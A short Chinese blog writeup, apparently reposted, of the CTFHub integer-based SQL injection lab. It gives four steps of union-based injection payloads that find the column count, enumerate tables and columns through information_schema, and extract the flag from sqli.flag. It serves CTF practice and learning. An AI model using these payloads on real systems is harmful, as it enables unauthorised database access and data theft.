CTFHub SQL 整数型注入[四步]

其他 2021-02-09 09:01:17 阅读次数: 0

判断列数

1 order by 2

判断回显点

1 union select 1,2

判断表名列名

-1 union select 1,group_concat(table_name,'_',column_name) from information_schema.columns where table_schema=database()

在这里插入图片描述

得出结果【两种方法】

-1 union select 1,flag from sqli.flag limit 0,1
-1 union select 1,(select flag from sqli.flag limit 0,1)

在这里插入图片描述

在这里插入图片描述

猜你喜欢

转载自blog.csdn.net/luminous_you/article/details/110672254

CTFHub SQL 整数型注入[四步]

ctfhub技能树—sql注入—整数型注入

CTFHub-SQL注入整数型注入字符型注入报错注入布尔盲注

[ctfhub]SQL注入

CTFHUB之SQL注入

ctfhub技能树—sql注入—Cookie注入

ctfhub技能树—sql注入—字符型注入

CTFHub Web题学习笔记（SQL注入题解writeup）

【CTF整理】CTFhub技能树-Web-SQL注入

CTFhub时间注入题解

CTFHUB之RCE注入

CTFhub 反射型xss

web安全学习-------2.sql整数型注入

sql整数型注入-sqli第2关

CTFHUB------XSS反射型(WP)

CTFHUB刷题反射型XSS攻击

CTFHub RCE远程代码执行-命令注入笔记

CTFHub misc 四星暴力破解

ctfhub and XCTF

SQL注入——整数注入

CTFHub-web(cookie)

CTFHub(302跳转)

ctfhub---SSRF

ctfhub 杂项 --icmp

[CTFHUB]迟来的签到题

CTFHub .DS_Store

CTFHub HG泄露

CTFHub SVN泄露

CTFHUB——信息泄露

CTFhub—弱密码(web)

今日推荐

基于大语言模型的开源知识库问答系统 MaxKB GitHub Star 数量突破 5,000 个！

美国拟限制 AI 大模型出口中国和俄罗斯

苹果将与 OpenAI 达成协议，将 ChatGPT 应用于 iPhone

openKylin 社区生态委员会第六次会议圆满召开

阿里云正式发布通义千问 2.5

Python 3.13 发布首个 Beta：实验性自由线程模式和 JIT、改进交互式解释器

Stack Overflow 拿我的代码去训练 AI 大模型，还封了我的账号

Pop!_OS 的 COSMIC 桌面完成 App Store 上架工作

《2024 年一季度互联网投融资运行情况》研究报告

报告：Django 仍然是 74% 开发者的首选

15 年前上了“FFmpeg 耻辱柱”，今天他还得谢谢咱——腾讯QQPlayer一雪前耻？

TIOBE 5 月榜单：Fortran “复活”进入 Top 10

周排行

记一下去大梅沙的准备（2018-05-26）

Spring 注解事务

基于HTTP协议的客户端缓存

阿里云rds 备份和还原

[PHP] 几个拖慢 PHP 程序/API 运行速度的点

python 代码风格------------PEP8规则

js控制json生成菜单——自制菜单（一）

将字符串: 'k:1|k1:2|k2:3|k3:4 ' ,处理成 python 字典: {'k':1, 'k1':2, ...}

微信小程序转支付宝小程序

Qt551.窗口滚动条

每日归档

更多

2024-05-13(18)

2024-05-12(0)

2024-05-11(38)

2024-05-10(38)

2024-05-09(35)

2024-05-08(42)

2024-05-07(14)

2024-05-06(40)

2024-05-05(0)

2024-05-04(7)